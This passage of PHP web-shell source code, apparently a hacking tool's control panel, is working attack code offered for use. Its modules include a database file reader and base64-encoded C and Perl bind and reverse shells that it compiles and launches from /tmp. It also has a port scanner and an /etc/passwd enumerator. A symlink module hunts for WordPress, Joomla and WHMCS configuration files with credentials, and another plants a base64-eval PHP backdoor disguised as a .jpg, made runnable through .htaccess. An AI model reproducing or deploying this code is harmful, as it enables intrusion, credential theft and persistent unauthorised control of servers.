1359 while($item = $db->fetch($tbls_res)) {
1360 list($key, $value) = each($item);
1361 $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.''));
1362 $value = htmlspecialchars($value);
1363 echo "<nobr><input type='checkbox' name='tbl[]' value='".$value."'> <a href=# onclick=\"st('".$value."')\">".$value."</a> (".$n['n'].")</nobr><br>";
1364 }
1365 echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'></td><td style='border-top:2px solid #666;'>";
1366 if(@$_POST['p1'] == 'select') {
1367 $_POST['p1'] = 'query';
1368 $db->query('SELECT COUNT(*) as n FROM '.$_POST['p2'].'');
1369 $num = $db->fetch();
1370 $num = $num['n'];
1371 echo "<span>".$_POST['p2']."</span> ($num) ";
1372 for($i=0;$i<($num/30);$i++)
1373 if($i != (int)$_POST['p3'])
1374 echo "<a href='#' onclick='st(\"".$_POST['p2']."\", $i)'>",($i+1),"</a> ";
1375 else
1376 echo ($i+1)," ";
1377 if($_POST['type']=='pgsql')
1378 $_POST['p3'] = 'SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30);
1379 else
1380 $_POST['p3'] = 'SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']*30).',30';
1381 echo "<br><br>";
1382 }
1383 if((@$_POST['p1'] == 'query') && !empty($_POST['p3'])) {
1384 $db->query(@$_POST['p3']);
1385 if($db->res !== false) {
1386 $title = false;
1387 echo '<table width=100% cellspacing=0 cellpadding=2 class=main>';
1388 $line = 1;
1389 while($item = $db->fetch()) {
1390 if(!$title) {
1391 echo '<tr>';
1392 foreach($item as $key => $value)
1393 echo '<th>'.$key.'</th>';
1394 reset($item);
1395 $title=true;
1396 echo '</tr><tr>';
1397 $line = 2;
1398 }
1399 echo '<tr class="l'.$line.'">';
1400 $line = $line==1?2:1;
1401 foreach($item as $key => $value) {
1402 if($value == null)
1403 echo '<td><i>null</i></td>';
1404 else
1405 echo '<td>'.nl2br(htmlspecialchars($value)).'</td>';
1406 }
1407 echo '</tr>';
1408 }
1409 echo '</table>';
1410 } else {
1411 echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>';
1412 }
1413 }
1414 echo "<br><textarea name='p3' style='width:100%;height:100px'>".@htmlspecialchars($_POST['p3'])."</textarea><br/><input type=submit value='Execute'>";
1415 echo "</td></tr>";
1416 }
1417 echo "</table></form><br/><form onsubmit='document.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input class='toolsInp' type=text name=f><input type=submit value='>>'></form>";
1418 if(@$_POST['p1'] == 'loadfile') {
1419 $db->query("SELECT LOAD_FILE('".addslashes($_POST['p2'])."') as file");
1420 $file = $db->fetch();
1421 echo '<pre class=ml1>'.htmlspecialchars($file['file']).'</pre>';
1422 }
1423 }
1424 echo '</div>';
1425 printFooter();
1426}
1427
1428function actionNetwork() {
1429 printHeader();
1430 $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsNCiAgICBpbnQgZmQ7DQogICAgc3RydWN0IHNvY2thZGRyX2luIHNpbjsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogICAgc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsNCiAgICBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsNCiAgICBpZiAoKGNvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpKTwwKSB7DQogICAgICAgIHBlcnJvcigiQ29ubmVjdCBmYWlsIik7DQogICAgICAgIHJldHVybiAwOw0KICAgIH0NCiAgICBkdXAyKGZkLCAwKTsNCiAgICBkdXAyKGZkLCAxKTsNCiAgICBkdXAyKGZkLCAyKTsNCiAgICBzeXN0ZW0oIi9iaW4vc2ggLWkiKTsNCiAgICBjbG9zZShmZCk7DQp9";
1431 $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
1432 $bind_port_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgew0KICAgIGludCBzLGMsaTsNCiAgICBjaGFyIHBbMzBdOw0KICAgIHN0cnVjdCBzb2NrYWRkcl9pbiByOw0KICAgIGRhZW1vbigxLDApOw0KICAgIHMgPSBzb2NrZXQoQUZfSU5FVCxTT0NLX1NUUkVBTSwwKTsNCiAgICBpZighcykgcmV0dXJuIC0xOw0KICAgIHIuc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgci5zaW5fcG9ydCA9IGh0b25zKGF0b2koYXJndlsxXSkpOw0KICAgIHIuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7DQogICAgYmluZChzLCAoc3RydWN0IHNvY2thZGRyICopJnIsIDB4MTApOw0KICAgIGxpc3RlbihzLCA1KTsNCiAgICB3aGlsZSgxKSB7DQogICAgICAgIGM9YWNjZXB0KHMsMCwwKTsNCiAgICAgICAgZHVwMihjLDApOw0KICAgICAgICBkdXAyKGMsMSk7DQogICAgICAgIGR1cDIoYywyKTsNCiAgICAgICAgd3JpdGUoYywiUGFzc3dvcmQ6Iiw5KTsNCiAgICAgICAgcmVhZChjLHAsc2l6ZW9mKHApKTsNCiAgICAgICAgZm9yKGk9MDtpPHN0cmxlbihwKTtpKyspDQogICAgICAgICAgICBpZiggKHBbaV0gPT0gJ1xuJykgfHwgKHBbaV0gPT0gJ1xyJykgKQ0KICAgICAgICAgICAgICAgIHBbaV0gPSAnXDAnOw0KICAgICAgICBpZiAoc3RyY21wKGFyZ3ZbMl0scCkgPT0gMCkNCiAgICAgICAgICAgIHN5c3RlbSgiL2Jpbi9zaCAtaSIpOw0KICAgICAgICBjbG9zZShjKTsNCiAgICB9DQp9";
1433 $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
1434
1435 echo '<h1>Network tools</h1><div class=content>
1436 <form name=\'nfp\' onSubmit="g(null,null,this.using.value,this.port.value,this.pass.value);return false;">
1437 <br /><span>Bind port to /bin/sh</span><br/>
1438 Port: <input type=\'text\' name=\'port\' value=\'443\'> Password: <input type=\'text\' name=\'pass\' value=\'Str4what\'> Using: <select name="using"><option value=\'bpc\'>C</option><option value=\'bpp\'>Perl</option></select> <input type=submit value=">>">
1439 </form>
1440 <form name=\'nfp\' onSubmit="g(null,null,this.using.value,this.server.value,this.port.value);return false;">
1441 <br /><br /><span>Back-connect to</span><br/>
1442 Server: <input type=\'text\' name=\'server\' value="'.$_SERVER['REMOTE_ADDR'].'"> Port: <input type=\'text\' name=\'port\' value=\'443\'> Using: <select name="using"><option value=\'bcc\'>C</option><option value=\'bcp\'>Perl</option></select> <input type=submit value=">>">
1443 </form><br>';
1444 if(isset($_POST['p1'])) {
1445 function cf($f,$t) {
1446 $w=@fopen($f,"w") or @function_exists('file_put_contents');
1447 if($w) {
1448 @fwrite($w,@base64_decode($t)) or @fputs($w,@base64_decode($t)) or @file_put_contents($f,@base64_decode($t));
1449 @fclose($w);
1450 }
1451 }
1452 if($_POST['p1'] == 'bpc') {
1453 cf("/tmp/bp.c",$bind_port_c);
1454 $out = ex("gcc -o /tmp/bp /tmp/bp.c");
1455 @unlink("/tmp/bp.c");
1456 $out .= ex("/tmp/bp ".$_POST['p2']." ".$_POST['p3']." &");
1457 echo "<pre class=ml1>$out\n".ex("ps aux | grep bp")."</pre>";
1458 }
1459 if($_POST['p1'] == 'bpp') {
1460 cf("/tmp/bp.pl",$bind_port_p);
1461 $out = ex(which("perl")." /tmp/bp.pl ".$_POST['p2']." &");
1462 echo "<pre class=ml1>$out\n".ex("ps aux | grep bp.pl")."</pre>";
1463 }
1464 if($_POST['p1'] == 'bcc') {
1465 cf("/tmp/bc.c",$back_connect_c);
1466 $out = ex("gcc -o /tmp/bc /tmp/bc.c");
1467 @unlink("/tmp/bc.c");
1468 $out .= ex("/tmp/bc ".$_POST['p2']." ".$_POST['p3']." &");
1469 echo "<pre class=ml1>$out\n".ex("ps aux | grep bc")."</pre>";
1470 }
1471 if($_POST['p1'] == 'bcp') {
1472 cf("/tmp/bc.pl",$back_connect_p);
1473 $out = ex(which("perl")." /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." &");
1474 echo "<pre class=ml1>$out\n".ex("ps aux | grep bc.pl")."</pre>";
1475 }
1476 }
1477 echo '</div>';
1478 printFooter();
1479}
1480
1481function actionPortScanner() {
1482 printHeader();
1483 echo '<h1>Port Scanner</h1>';
1484 echo '<div class="content">';
1485 echo '<form action="" method="post">';
1486
1487 if(isset($_POST['host']) && is_numeric($_POST['end']) && is_numeric($_POST['start'])){
1488 $start = strip_tags($_POST['start']);
1489 $end = strip_tags($_POST['end']);
1490 $host = strip_tags($_POST['host']);
1491 for($i = $start; $i<=$end; $i++){
1492 $fp = @fsockopen($host, $i, $errno, $errstr, 3);
1493 if($fp){
1494 echo 'Port '.$i.' is <font color=green>open</font><br>';
1495 }
1496 flush();
1497 }
1498 } else {
1499 echo '<br /><br /><center><input type="hidden" name="a" value="PortScanner"><input type="hidden" name=p1><input type="hidden" name="p2">
1500 <input type="hidden" name="c" value="'.htmlspecialchars($GLOBALS['cwd']).'">
1501 <input type="hidden" name="charset" value="'.(isset($_POST['charset'])?$_POST['charset']:'').'">
1502 Host: <input type="text" name="host" value="localhost"/><br /><br />
1503 Port start: <input type="text" name="start" value="0"/><br /><br />
1504 Port end:<input type="text" name="end" value="5000"/><br /><br />
1505 <input type="submit" value="Scan Ports" />
1506 </form></center><br /><br />';
1507 }
1508 echo '</div>';
1509 printFooter();
1510}
1511
1512function actionReadable() {
1513 printHeader();
1514 echo '<h1>Readable Dirs</h1>';
1515 echo '<div class="content">';
1516 $sm = ini_get('safe_mode');
1517 if($sm) {
1518 echo '<br /><b>Error: safe_mode = on</b><br /><br />';
1519 } else {
1520 @$passwd = fopen('/etc/passwd','r');
1521 if (!$passwd) {
1522 echo '<br /><b>[-] Error : coudn`t read /etc/passwd</b><br /><br />';
1523 } else {
1524 $pub = array();
1525 $users = array();
1526 $conf = array();
1527 $i = 0;
1528 while(!feof($passwd)) {
1529 $str = fgets($passwd);
1530 if ($i > 35) {
1531 $pos = strpos($str,':');
1532 $username = substr($str,0,$pos);
1533 $dirz = '/home/'.$username.'/public_html/';
1534 if (($username != '')) {
1535 if (is_readable($dirz)) {
1536 array_push($users,$username);
1537 array_push($pub,$dirz);
1538 }
1539 }
1540 }
1541 $i++;
1542 }
1543 echo '<br><br>';
1544 echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd\n"."<br />";
1545 echo "[+] Founded ".sizeof($pub)." readable public_html directories\n"."<br /><br /><br />";
1546 foreach ($users as $user) {
1547 $path = "/home/$user/public_html/";
1548 echo $path."<br>";
1549 }
1550 echo "<br /><br /><br />[+] Complete...\n"."<br />";
1551 }
1552 }
1553 echo '</div>';
1554 printFooter();
1555}
1556
1557function actionSymlink() {
1558 printHeader();
1559 echo '<h1>Symlink</h1>';
1560 $furl = 'http://'.$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
1561 $expld = explode('/',$furl );
1562 $burl =str_replace(end($expld),'',$furl);
1563
1564 echo '<div class="content"><center>
1565 <h3>[ <a href="#" onclick="g(\'symlink\',null,\'website\',null)">Domains</a> ] -
1566 [ <a href="#" onclick="g(\'symlink\',null,\'whole\',null)">Whole Server Symlink</a> ] -
1567 [ <a href="#" onclick="g(\'symlink\',null,\'config\',null)">Config files symlink</a> ]</h3></center>';
1568
1569 if(isset($_POST['p1']) && $_POST['p1']=='website')
1570 {
1571 echo "<center>";
1572 $d0mains = @file("/etc/named.conf");
1573 if(!$d0mains){
1574 echo "<pre class=ml1 style='margin-top:5px'>Cant access this file on server -> [ /etc/named.conf ]</pre></center>";
1575 } else {
1576 echo "<table align=center class='main' border=0 ><tr><th> Count </th><th> Domains </th><th> Users </th></tr>";
1577
1578 $unk = array();
1579 foreach($d0mains as $d0main){
1580 if(@eregi("zone",$d0main)){
1581 preg_match_all('#zone "(.*)"#', $d0main, $domains);
1582 flush();
1583 if(strlen(trim($domains[1][0])) > 2){
1584 $unk[] = $domains[1][0];
1585 flush();
1586
1587 }
1588 }
1589 }
1590 $count=1;
1591 $unk = array_unique($unk);
1592 $l=0;
1593 foreach($unk as $d){
1594 $user = posix_getpwuid(@fileowner("/etc/valiases/".$d));
1595 echo "<tr".($l?' class=l1':'')."><td>".$count."</td><td><a href=http://".$d."/>".$d."</a></td><td>".$user['name']."</td></tr>";
1596 flush();
1597 $count++;
1598 $l=$l?0:1;
1599 }
1600 echo "</table>";
1601 }
1602 echo "</center>";
1603 }
1604
1605 if(isset($_POST['p1']) && $_POST['p1']=='whole')
1606 {
1607 echo "<center>";
1608 @mkdir('sym',0777);
1609 $hdt = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
1610 $hfp =@fopen ('sym/.htaccess','w');
1611 fwrite($hfp ,$hdt);
1612 if(function_exists('symlink')) {
1613 @symlink('/','sym/root');
1614 }
1615 $d0mains = @file('/etc/named.conf');
1616 if(!$d0mains) {
1617 echo "<pre class=ml1 style='margin-top:5px'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>";
1618 } else {
1619 echo "<table align='center' width='40%' class='main'><tr><th> Count </th><th> Domains </th><th> User </th><th> Symlink </th></tr>";
1620 $count=1;
1621 $mck = array();
1622 foreach($d0mains as $d0main){
1623 if(@eregi('zone',$d0main)){
1624 preg_match_all('#zone "(.*)"#',$d0main,$domain);
1625 flush();
1626 if(strlen(trim($domain[1][0])) >2){
1627 $mck[] = $domain[1][0];
1628 }
1629 }
1630 }
1631 $mck = array_unique($mck);
1632 $l=0;
1633 foreach($mck as $d) {
1634 $user = posix_getpwuid(@fileowner('/etc/valiases/'.$d));
1635 $ddt = $user['name'];
1636 //@symlink('/','sym/root');
1637 $ddt = $d;
1638 if(@eregi("\.ir",$d) or @eregi("\.il",$d)) {
1639 $ddt = "<div style=' color: #FF0000 ; text-shadow: 0px 0px 1px red; '>".$d.'</div>';
1640 }
1641 echo "<tr".($l?' class=l1':'')."><td>".$count++."</td><td><a target='_blank' href=http://".$d.'/>'.$ddt.' </a></td><td>'.$user['name']."</td><td><a href='sym/root/home/".$user['name']."/public_html' target='_blank'>symlink </a></td></tr>";
1642 flush();
1643 $l=$l?0:1;
1644 }
1645 echo '</table>';
1646 }
1647 echo "</center>";
1648 }
1649
1650 if(isset($_POST['p1']) && $_POST['p1']=='config')
1651 {
1652 echo "<center>";
1653 @mkdir('sym',0777);
1654 $hdt = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
1655 $hfp = @fopen ('sym/.htaccess','w');
1656 @fwrite($hfp ,$hdt);
1657 if(function_exists('symlink')) {
1658 @symlink('/','sym/root');
1659 }
1660 $d0mains = @file('/etc/named.conf');
1661 if(!$d0mains) {
1662 echo "<pre class=ml1 style='margin-top:5px'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>";
1663 } else {
1664 echo "<table align='center' width='40%' class='main' ><tr><th> Count </th><th> Domains </th><th> Script </th></tr>";
1665 $count = 1;
1666 $l=0;
1667 foreach($d0mains as $d0main){
1668 if(@eregi('zone',$d0main)){
1669 preg_match_all('#zone "(.*)"#',$d0main,$domain);
1670 flush();
1671 if(strlen(trim($domain[1][0]))>2){
1672 $user = posix_getpwuid(@fileowner('/etc/valiases/'.$domain[1][0]));
1673
1674 $c1 = $burl.'/sym/root/home/'.$user['name'].'/public_html/wp-config.php';
1675 $ch01 = get_headers($c1);
1676 $cf01 = $ch01[0];
1677 $c2 = $burl.'/sym/root/home/'.$user['name'].'/public_html/blog/wp-config.php';
1678 $ch02 = get_headers($c2);
1679 $cf02 = $ch02[0];
1680 $c3 = $burl.'/sym/root/home/'.$user['name'].'/public_html/configuration.php';
1681 $ch03 = get_headers($c3);
1682 $cf03 = $ch03[0];
1683 $c4 = $burl.'/sym/root/home/'.$user['name'].'/public_html/joomla/configuration.php';
1684 $ch04 = get_headers($c4);
1685 $cf04 = $ch04[0];
1686 $c5 = $burl.'/sym/root/home/'.$user['name'].'/public_html/includes/config.php';
1687 $ch05 = get_headers($c5);
1688 $cf05 = $ch05[0];
1689 $c6 = $burl.'/sym/root/home/'.$user['name'].'/public_html/vb/includes/config.php';
1690 $ch06 = get_headers($c6);
1691 $cf06 = $ch06[0];
1692 $c7 = $burl.'/sym/root/home/'.$user['name'].'/public_html/forum/includes/config.php';
1693 $ch07 = get_headers($c7);
1694 $cf07 = $ch07[0];
1695 $c8 = $burl.'/sym/root/home/'.$user['name'].'public_html/clients/configuration.php';
1696 $ch08 = get_headers($c8);
1697 $cf08 = $ch08[0];
1698 $c9 = $burl.'/sym/root/home/'.$user['name'].'/public_html/support/configuration.php';
1699 $ch09 = get_headers($c9);
1700 $cf09 = $ch09[0];
1701 $c10 = $burl.'/sym/root/home/'.$user['name'].'/public_html/client/configuration.php';
1702 $ch10 = get_headers($c10);
1703 $cf10 = $ch10[0];
1704 $c11 = $burl.'/sym/root/home/'.$user['name'].'/public_html/submitticket.php';
1705 $ch11 = get_headers($c11);
1706 $cf11 = $ch11[0];
1707 $c12 = $burl.'/sym/root/home/'.$user['name'].'/public_html/client/configuration.php';
1708 $ch12 = get_headers($c12);
1709 $cf12 = $ch12[0];
1710 $c13 = $burl.'/sym/root/home/'.$user['name'].'/public_html/includes/configure.php';
1711 $ch13 = get_headers($c13);
1712 $cf13 = $ch13[0];
1713 $c14 = $burl.'/sym/root/home/'.$user['name'].'/public_html/include/app_config.php';
1714 $ch14 = get_headers($c14);
1715 $cf14 = $ch14[0];
1716 $c15 = $burl.'/sym/root/home/'.$user['name'].'/public_html/sites/default/settings.php';
1717 $ch15 = get_headers($c15);
1718 $cf15 = $ch15[0];
1719
1720 $out = ' ';
1721 if(strpos($cf01,'200') == true) { $out = "<a href='".$c1."' target='_blank'>Wordpress</a>"; }
1722 elseif(strpos($cf02,'200') == true) { $out = "<a href='".$c2."' target='_blank'>Wordpress</a>"; }
1723 elseif(strpos($cf03,'200') == true && strpos($cf11,'200') == true) { $out = " <a href='".$c11."' target='_blank'>WHMCS</a>"; }
1724 elseif(strpos($cf09,'200') == true) { $out = " <a href='".$c9."' target='_blank'>WHMCS</a>"; }
1725 elseif(strpos($cf10,'200') == true) { $out = " <a href='".$c10."' target='_blank'>WHMCS</a>"; }
1726 elseif(strpos($cf03,'200') == true) { $out = " <a href='".$c3."' target='_blank'>Joomla</a>"; }
1727 elseif(strpos($cf04,'200') == true) { $out = " <a href='".$c4."' target='_blank'>Joomla</a>"; }
1728 elseif(strpos($cf05,'200') == true) { $out = " <a href='".$c5."' target='_blank'>vBulletin</a>"; }
1729 elseif(strpos($cf06,'200') == true) { $out = " <a href='".$c6."' target='_blank'>vBulletin</a>"; }
1730 elseif(strpos($cf07,'200') == true) { $out = " <a href='".$c7."' target='_blank'>vBulletin</a>"; }
1731 elseif(strpos($cf08,'200') == true) { $out = " <a href='".$c7."' target='_blank'>Client Area</a>"; }
1732 elseif(strpos($cf12,'200') == true) { $out = " <a href='".$c7."' target='_blank'>Client Area</a>"; }
1733 elseif(strpos($cf13,'200') == true) { $out = " <a href='".$c7."' target='_blank'>osCommerce/Zen Cart</a>"; }
1734 elseif(strpos($cf14,'200') == true) { $out = " <a href='".$c7."' target='_blank'>Magento</a>"; }
1735 elseif(strpos($cf15,'200') == true) { $out = " <a href='".$c7."' target='_blank'>Drupal</a>"; }
1736 else {
1737 continue;
1738 }
1739 echo '<tr'.($l?' class=l1':'').'><td>'.$count++.'</td><td><a href=http://www.'.$domain[1][0].'/>'.$domain[1][0].'</a></td><td>'.$user['name'].'</td><td>'.$out.'</td></tr>';
1740 flush();
1741 $l=$l?0:1;
1742 }
1743 }
1744 }
1745 echo "</table>";
1746 }
1747 echo "</center>";
1748 }
1749 echo "</div>";
1750 printFooter();
1751}
1752
1753function actionIMGB() {
1754
1755 printHeader();
1756 echo '<h1>Backdoor</h1>';
1757 echo '<div class="content">';
1758 echo '<div class=header>
1759 <center>
1760 <div style="background:#333;width:450px;padding:10px;padding-bottom:20px;text-align:left;">
1761 <h3 style="display:block;color:gold">
1762 Instructions:</h3>
1763 <hr>
1764
1765 <small style="text-align:left;font:12px Tahoma;color:red"><b>Pag di mo to sinunod, baka mawalan ka ng access sa shell mo kaya basahin mo muna to.</small>
1766 <br><br>
1767 <small style="text-align:left;font:12px Tahoma;color:#fff">
1768 NOTE: PHP Shell talaga ito pero naka .jpg extension lang. Alam niyo na yun kung ano kasi pro po kayo mastah eh. :*
1769 <br>
1770 <br>Dapat nasa directory ka ng folder ng images ng site, huwag sa directory ng shell mo, GG ka sa .htaccess pag clinick mo at nasa dir ka ng shell mo.
1771 <input style="width:300px;" value="<Files *.php> deny from all </Files>"><Files *.php>
1772</Files>
1773</input> << See :P</pre></small>
1774<center>
1775<hr>
1776</center>
1777<br>
1778
1779<center>
1780
1781 <a style="font-size:13px;padding:5px;background:#222;" href=# onclick="g(null,null,\'php.ini\',null)">Generate .htaccess</a>
1782 <a style="font-size:13px;padding:5px;background:#222;" href=# onclick="g(null,null,null,null,\'sh\')">Generate Shell </a>
1783 <br><br>
1784 PS. Please rename the zoro.jpg sa kahit anong di mahahalata ng admin. :)
1785 </center>
1786 </div>
1787';
1788
1789 if(!empty($_POST['p1'])&& isset($_POST['p1']))
1790 {
1791 $fil=fopen($GLOBALS['cwd'].".htaccess","w");
1792 fwrite($fil,'
1793<Files *.php>
1794deny from all
1795</Files>
1796
1797DirectoryIndex ./index.php
1798AddHandler php5-script .php .png .jpg .gif .jpeg .mp4 .mp3'
1799
1800);
1801 fclose($fil);
1802 }
1803 if(!empty($_POST['p3']) && isset($_POST['p3']))
1804 {
1805 $path = getcwd();
1806 $file = '<?php
1807
1808eval("?>".base64_decode("PD9waHAgJGF1dGhfcGFzcyA9ICJjNGNhNDIzOGEwYjkyMzgyMGRjYzUwOWE2Zjc1ODQ5YiI7JGNvbG9yID0gIiNmZmYiOyRzZWMgPSAxO0BzZXNzaW9uX3N0YXJ0KCk7aWYoaXNzZXQoJF9HRVRbImxvZ291dCJdKSl7dW5zZXQoJF9TRVNTSU9OW21kNSgkX1NFUlZFUlsnSFRUUF9IT1NUJ10pXSk7ZWNobyAnYnllISc7fWZ1bmN0aW9uIHByaW50TG9naW4oKSB7Pz48Zm9ybSBtZXRob2Q9cG9zdD48c3BhbiBzdHlsZT0iZm9udDogOXB0IEhlbHZldGljYSxWZXJkYW5hOyI+RW50ZXIgdGhlIHBhc3N3b3JkOiA8aW5wdXQgc3R5bGU9ImZvbnQ6IDlwdCBIZWx2ZXRpY2EsVmVyZGFuYTtib3JkZXI6MXB4IHNvbGlkIGJsYWNrO3RleHQtYWxpZ246Y2VudGVyIiAgcGxhY2Vob2xkZXI9IiB6b3JvIiB0eXBlPSJmYWtlbG9naW4iIG5hbWU9ImZha2UiPiA8aW5wdXQgb25jbGljaz0iYWxlcnQoJ1Ryb29vb29sZWQhIDpQIEprLiBXcm9uZyBQYXNzd29yZCBib3NzIScpIiB0eXBlPXN1Ym1pdCB2YWx1ZT0iTG9naW4iPjwvZm9ybT48Zm9ybSBtZXRob2Q9InBvc3QiPjxpbnB1dCBzdHlsZT0iZm9udDogOXB0IEhlbHZldGljYSxWZXJkYW5hO2JvcmRlcjoxcHggc29saWQgI2ZmZjt0ZXh0LWFsaWduOmNlbnRlciIgICB0eXBlPSJwYXNzd29yZCIgbmFtZT0icGFzcyI+PC9mb3JtPjxicj48L2Zvcm0+PD9waHAgZXhpdDt9aWYoJHNlYyA9PSAxICYmICFpc3NldCggJF9TRVNTSU9OW21kNSgkX1NFUlZFUlsnSFRUUF9IT1NUJ10pXSkpaWYoIGVtcHR5KCAkYXV0aF9wYXNzICkgfHwoIGlzc2V0KCAkX1BPU1RbJ3Bhc3MnXSApICYmICggbWQ1KCRfUE9TVFsncGFzcyddKSA9PSAkYXV0aF9wYXNzICkgKSApJF9TRVNTSU9OW21kNSgkX1NFUlZFUlsnSFRUUF9IT1NUJ10pXSA9IHRydWU7ZWxzZSBwcmludExvZ2luKCk7JGZpbGVzID0gQCRfRklMRVNbImZpbGVzIl07aWYgKCRmaWxlc1sibmFtZSJdICE9ICcnKSB7JGZ1bGxwYXRoID0gJF9SRVFVRVNUWyJwYXRoIl0gLiAkZmlsZXNbIm5hbWUiXTtpZiAobW92ZV91cGxvYWRlZF9maWxlKCRmaWxlc1sndG1wX25hbWUnXSwgJGZ1bGxwYXRoKSkge2VjaG8gIjxoMT48YSBocmVmPSckZnVsbHBhdGgnPllvdXIgZmlsZTwvYT48L2gxPiI7fX0/Pg0KPGh0bWw+PGhlYWQ+PHRpdGxlPi46OlN0cjR3aGF0IFBpcmF0ZXMgQ3Jldzo6LjwvdGl0bGU+PHN0eWxlPmJvZHkge2ZvbnQ6IDlwdCBIZWx2ZXRpY2EsVmVyZGFuYTtiYWNrZ3JvdW5kOmJsYWNrO31hIHt0ZXh0LWRlY29yYXRpb246bm9uZTtjb2xvcjpibGFjaztiYWNrZ3JvdW5kOnJnYigyNDIsMjQyLDI0Mik7Ym9yZGVyOjFweCBzb2xpZCBncmV5O3BhZGRpbmc6MnB4O308L3N0eWxlPjwvaGVhZD48Ym9keT48Zm9ybSBtZXRob2Q9UE9TVCBlbmN0eXBlPSJtdWx0aXBhcnQvZm9ybS1kYXRhIiBhY3Rpb249IiI+PGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9ImZpbGVzIj48aW5wdXQgdHlwZT1zdWJtaXQgdmFsdWU9IlVwbG9hZCI+PC9mb3JtPjxmb3JtIG1ldGhvZD0icG9zdCIgYWN0aW9uPSIiPjxpbnB1dCBzdHlsZT0iYmFja2dyb3VuZDpibGFjaztjb2xvcjpsaW1lO2JvcmRlcjoycHggc29saWQgYmxhY2s7OyIgbmFtZT1zaHBjIHZhbHVlPSIiIHBsYWNlaG9sZGVyPSJDb21tYW5kIj4gPGlucHV0IHR5cGU9c3VibWl0IHZhbHVlPSJFeGVjdXRlIENvbW1hbmQiPjwvZm9ybT48dGV4dGFyZWEgc3R5bGU9IndpZHRoOjUxMHB4O2hlaWdodDoyMDBweDtiYWNrZ3JvdW5kOmJsYWNrO2NvbG9yOmxpbWU7Ym9y